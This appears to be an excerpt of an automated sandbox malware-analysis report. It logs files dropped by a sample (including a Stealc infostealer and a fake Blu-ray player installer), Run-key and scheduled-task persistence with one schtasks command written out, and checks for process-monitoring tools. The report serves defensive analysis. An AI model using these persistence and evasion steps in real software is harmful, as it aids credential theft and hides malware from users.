Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-IKC0D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\hhnjqu9y[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\JavUmar[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libtiff-5.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk-win32-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001567001\hhnjqu9y.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-AD0KH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-S71CN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgdk_pixbuf-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-1FNCS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-71E5U.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpixman-1-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libjpeg-8.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\univ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-N39PE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\RDX123456[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangocairo-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgraphite2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	File created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001590001\51a08c3032.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LIOS8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgcc_s_dw2-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-A2FGH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\yxrd0ob7[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-JIOLC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-7L9K5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\new_v8[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EQ0NL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangoft2-1.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-2MA22.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpng16-16.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libpangomm-1.4-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-ADJOR.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Offnewhere[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-EOQJN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-F3PSE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-OJPOO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001591001\2bbdb01603.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1001589001\109418c5c3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgomp-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libsigc-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libharfbuzz-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-KC0R0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgobject-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000061101\stail.exe	File created: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-NT9JC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-M38NA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	File created: C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libintl-8.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\librsvg-2-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblzma-5.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe	File created: C:\Users\user\AppData\Local\Temp\SfOAQrSBjSOejUhiNHNf.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-K2BT4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File created: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-LD4GG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\libgmodule-2.0-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\is-RUKE1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\liblcms2-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp	File created: C:\Users\user\AppData\Local\BluRay Player 1.2.16\unins000.exe (copy)	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\BluRay Player 1.2.16\blurayplayer32.exe	File created: C:\ProgramData\DZ Blu-ray player 11.1.45\DZ Blu-ray player 11.1.45.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	File created: C:\ProgramData\LgAmARwZ\Application.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efbc18aa93.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 109418c5c3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 51a08c3032.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2bbdb01603.exe	Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\3288f0a855.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe	Window searched: window name: Regmonclass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efbc18aa93.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efbc18aa93.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 109418c5c3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 109418c5c3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 51a08c3032.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 51a08c3032.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2bbdb01603.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2bbdb01603.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

7_2_006A9860

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\23a0892ef8\Gxtuum.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe	Process information set: NOOPENFILEERRORBOX
